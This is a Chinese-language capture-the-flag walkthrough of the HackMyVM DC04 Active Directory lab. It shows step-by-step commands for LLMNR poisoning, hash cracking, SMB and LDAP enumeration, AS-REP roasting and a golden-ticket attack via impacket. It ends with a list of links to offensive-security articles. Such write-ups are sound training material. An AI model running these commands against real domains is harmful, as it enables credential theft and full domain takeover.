HackMyVm-DC04：难

14.1 外网打点

nmap -sS -p- -T4 192.168.0.103 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'

nmap -sS -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49710,49765 -T4 192.168.0.103 -A

自动重定向到这个域名

编辑下面的文件，将ip和域名加入进去

# windows
C:\Windows\System32\drivers\etc\hosts

linux也要，不然扫描不到东西，这里他变成了重定向次数过多，而不是之前的无法访问网站

echo "192.168.0.103 soupedecode.local" >> /etc/hosts

使用dir进行目录扫描，扫出来一个这个目录

dirb http://soupedecode.local

还有一个服务器信息

http://soupedecode.local/server-info

这里有一个服务版本，可以使用searchsploit检索一下（没有发现任何有用的东西）

我们一直往下翻，翻到了这个东西

继续将这个域名添加到hosts中，就可以访问站点了，是一个登录框

14.2 后台爆破

打开burp，fuzz sql注入、xss字典，都没有结果，使用相同的账号密码字典爆破也没有结果

继续信息收集

smbclient -L //192.168.0.103/ -N

后续也尝试了各种枚举，也没有东西。。。。。。

后边去看了看别人写的，就是这个机子很容易出问题，爆破几次后，后面怎么爆破都是403了

最后爆破出来账号密码是 admin:nimda

登录成功后会要求你输入ip地址

可能是命令执行，但是尝试各种命令执行都失败了，只要和|，&相关的都不行，看来是做了过滤

【RCE剖析】从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结—-实战解析

14.3 LLMNR

那就来试试DC3的LLMNR，我们在这个输入框里输入kali的ip地址

responder -I eth0 -wd

echo "websvc::soupedecode:e2985b38b501aed2:E5E63AAD4B475A06D1ECE4C7F78A2E60:010100000000000080646EFE3946DC01F711F570D52509F5000000000200080045004B0042004F0001001E00570049004E002D0043003700380051004F0038004100440032003100490004003400570049004E002D0043003700380051004F003800410044003200310049002E0045004B0042004F002E004C004F00430041004C000300140045004B0042004F002E004C004F00430041004C000500140045004B0042004F002E004C004F00430041004C000700080080646EFE3946DC01060004000200000008003000300000000000000000000000004000005C18B02FEAC5263030D32A3F0BCCDD51E0CAD786D3DFBABF65601AC3E74CE55D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0030002E003100340038000000000000000000" > hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

websvc:jordan23

密码已过期，应该知道怎么搞了吧

14.5 近源攻击！

按住esc进入选择用户界面，然后根据步骤一步一步走

输入原来的账号密码

选择ok，说明你密码输入对了

随后就可以修改你的账号密码了

14.6 smb信息收集

账号密码 websvc:jordan23

smbclient -L //192.168.0.103 -U "SOUPEDECODE.LOCAL/websvc%admin123"

在c盘找到第一个flag

smbclient //192.168.0.103/C -U "SOUPEDECODE.LOCAL/websvc%admin123"

14.7 查询域内SPN关联用户

有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果

14.8 枚举域内用户SID

python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/websvc@192.168.0.103 > users

grep "SidTypeUser" /data/demo/users | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt

14.9 获取不需要预认证用户的AS-REP哈希

结果没有

impacket-GetNPUsers -dc-ip 192.168.0.103 soupedecode.local/ -usersfile target_users.txt > hash

cat hash | grep +

14.10 ldapdomaindump

收集 LDAP 信息，获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。

ldapdomaindump -u "SOUPEDECODE.LOCAL\websvc" -p admin123 192.168.0.103

python -m http.server

访问8000端口，看到用户不属于任何特权组，仅仅是普通用户

仔细翻翻看，找到一个默认的账号密码

rtina979 ：Z~l3JhcV#7Q-1#M

同样的密码过期，需要近源攻击！

smbclient //192.168.0.103/C$ -U "SOUPEDECODE.LOCAL/rtina979%Z~l3JhcV#7Q-1#M"

这里给你们一张表，输入清楚了哈，我输了十多遍，艹

14.11 二次smb信息收集

此时就能正常登录了

在rtina979用户的Documents文件夹里找到一个rar压缩包，把它下载下来

解压需要密码

fcrackzip 工具只能用于破解 ZIP 文件，而我们的文件是 RAR 格式。

使用 rar2john 将 RAR 文件转换为 John the Ripper 可识别的哈希格式。

提取哈希：

rar2john Report.rar > report_hash.txt

使用字典攻击（使用 rockyou.txt）：

john --wordlist=/usr/share/wordlists/rockyou.txt report_hash.txt

解压，输入密码PASSWORD123

解压出来会发现当前目录有一个htm文件是一个渗透测试报告

在这个报告最后，能看到krbtgt的hash内容

14.12 黄金票据攻击

条件：

1. 获取 KRBTGT 账户哈希 – 通过 DCSync 或其他方式
2. 获取域 SID – 通过 LDAP 或 SMB 枚举
3. 知道域名 – 目标域的完整名称

获取到了KRBTGT哈希 先验证一下是否是正确的，红色代表失败，紫色代表hash正确，或者账户禁用，或者密码过期等等

0f55cdc40bd8f5814587f7e6b2f85e6f

14.12.1 获取域SID

域SID为：S-1-5-21-2986980474-46765180-2505414164

python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/rtina979@192.168.0.103

14.12.2 同步域时间

在平时可能会遇到kali和靶机的时间一直都不同步，怎么使用ntpdate或者其他时间同步工具，就是同步不起来，就需要使用下面第一行的命令了

systemctl stop systemd-timesyncd # 停止自动时间同步服务
ntpdate 192.168.0.103 # 强制同步时间

14.12.3 生成管理员的黄金票据

impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator

14.12.4 导入票据到环境变量

export KRB5CCNAME=administrator.ccache

14.12.5 使用票据

impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.0.103

至此渗透完成啦

14.13 总结

DC04 域渗透从外网打点起步，nmap 扫描发现目标开放 80、88、445 等端口，访问 80 端口需配置 hosts 解析域名，目录扫描找到后台登录页。爆破无果后，利用后台 IP 输入框发起 LLMNR 投毒，捕获 websvc 用户哈希并破解密码，通过近源攻击修改过期密码。

登录 SMB 获取首个 flag 后，枚举域用户发现 rtina979 账号及密码，再次近源攻击修改密码。登录其 SMB 下载加密压缩包，破解后得到渗透报告，从中提取 krbtgt 用户哈希。

获取域 SID 并同步时间后，生成 Administrator 黄金票据，导入环境变量后通过 wmiexec 成功登录域控，获取最高权限，全程依赖凭据获取与票据攻击，突破多重限制完成渗透。

往期推荐

全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细

HackMyVm-DC04 ：简单

HackMyVm-DC03 ：简单

HackMyVm-DC02 ：简单

HackMyVm-DC01 ：简单

HackMyVm-TriplAdvisor ：简单

HackMyVm-Runas ：简单

HackMyVm-Always ：简单

HackMyVm-Nessus ：简单

HackMyVm-Liar ：简单

HackMyVm-Simple ：简单

HackMyVm-Simple ：简单

HackMyVm-Zero ：简单

HackMyVm-OMG ：简单

新版BurpSuite v2025.6.3汉化版，附激活教程

Fine！2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具，全方位的目录爆破

集成MemProcFS，Vol2和Vol3的内存取证神器

重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器

x-waf，一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具，一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备，microsocks，一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！

一个永久的渗透知识库

【oscp】vulnerable_docker，三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备，microsocks，一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！

DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路

红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学

不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学

ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略

sql注入中各种waf的绕过方式，狗，盾，神，锁，宝

利用MySQL特性，WAF绕过技巧

SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细

大型翻车现场，十种waf绕过姿势，仅成功一种

喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透